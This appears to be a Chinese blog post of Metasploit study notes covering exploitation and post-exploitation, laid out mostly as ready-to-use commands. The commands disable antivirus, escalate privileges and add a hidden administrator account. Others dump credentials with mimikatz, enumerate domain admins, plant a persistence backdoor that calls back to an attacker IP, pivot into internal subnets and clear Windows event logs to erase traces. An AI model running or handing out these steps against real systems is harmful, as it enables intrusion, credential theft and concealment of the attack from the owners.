metasploit基础学习 渗透(拿shell)和后渗透(留后门)

  1. 使用metasploit时,要保持更新的好习惯,更新kali源 ,以及漏洞数据库,更新命令:
    (1)apt-get update:更新软件包的索引源,作用是同步源的软件包索引
    (2)apt-get upgrade: 升级系统上安装的所有软件包
    (3)apt-get dist-upgrade: 升级整个linux系统,包括内核升级

  2. 专业术语
    (1)Auxiliaries:辅助模块,负责执行扫描,嗅探,指纹识别等功能。
    (2)exploit:漏洞利用模块
    (3)payload:攻击载荷模块
    (4)post:后期渗透模块
    (5)encoders:编码工具模块,负责免杀,以防止被杀毒软件,防火墙等安全软件检测出来

  3. 常用的扫描模块,见图片
    在这里插入图片描述

  4. 在使用 nmap模块时,输入nmap -O -Pn或者nmap -O -P0(数字0) 表示不使用ping的方式,可以穿透防火墙。(不太好用)

  5. 进程迁移:但获取到meterpreter shell 时 ,该shell极其脆弱,可以把它和目标机中的一个稳定进程绑定在一起
    命令过程:在meterpreter下进行

    ps
    getpid :查看meterpreter shell的pid,一般吧迁移到explorer.exe的进程中,其比较稳定
    migrate 448 :把进程迁移到448进程中
    run post/windows/gather/checkvm 命令检查目标机是否运行在虚拟机上
    sysinfo 查看目标机的系统信息
    idletime 查看目标机最近运行时间。
    route 查看目标机完整的网络设置
    getuid 查看当前目标主机已经渗透成功的用户名
    getsystem 提权
    run post/windows/manage/killav 关闭目标主机系统的杀毒软件
    run post/windows/manage/enable_rdp 启动目标机的远程桌面协议,即3389
    run post/windows/manage/autoroute 查看本地子网情况
    background 将当前meterpreter终端隐藏在后台
    route add 添加路由命令
    run post/windows/gather/enum_logged_on_users 列举当前有多少用户登录了目标机
    run post/windows/gather/enmu_applications 列举安装在目标主机上的应用程序

  6. 提权:

    shell 进入shell

    			chcp 65001 解决进入shell中中文乱码
    			whoami/groups  查看我们当前的权限
    			getuid   查看已经获得的权限
    			systeminfo  查看系统信息,以及已打的补丁
    			netstat -an   查看开启端口号
    			net user  username  password /add    windows 中添加用户
    			net localgroup administrators username   /add  把添加的用户添加到管理员组
    			useradd –g 组名 用户名 linux下添加用户到root组
    			
    **使用mimikatz抓取密码**:用于在meterpreter模式下提权为systerm,在32位的进程中比较强大
    
    			(1)在windows 2000 和 windowsxp中无法使用   
    			(2)mimikatz_command -f hash ::
    			(3)kerberos  抓取系统票据
    			(4)wdigest  获取系统账户信息
    	查询域名称:net view /domain
    	查询域内计算机:net view /doamin:xx
    	查询域控制器时间:net time /domain
    	查询域管理用户:net group "domain admins" /domain
    	得到域控制主机名:net group "domain controllers" /domain
    	获取域控主机名:net group "domain controllers" /domain
    

    创建后门session:
    (1)在meterpreter中执行:
    persistence后门:
    run persistence -A -S -U -i 60 -p 4444 -r 192.168.15.128
    创建跳板机实现内网漫游:
    在拿到meterpreter 添加路由,以session为跳板:
    (1)run get_local_subnets: 获取子网网段
    在这里插入图片描述
    (2)run autoroute -s 192.168.110.0/24
    在这里插入图片描述
    (3)run autoroute -p: 查看路由信息
    (4)background : session 后台运行
    在这里插入图片描述
    在这以后跳板机已将创建完成,完成以后对内网的扫描攻击都要在该msf命令框中实现

    最后:clearrev 清除meterpreter的连接
    sessions -K 清除mfssession
    在windows下dos窗口清除日志信息:

    C:\Windows\system32>wevtutil cl security
    C:\Windows\system32>wevtutil cl system
    C:\Windows\system32>wevtutil cl application
    
  • 2
    点赞
  • 35
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值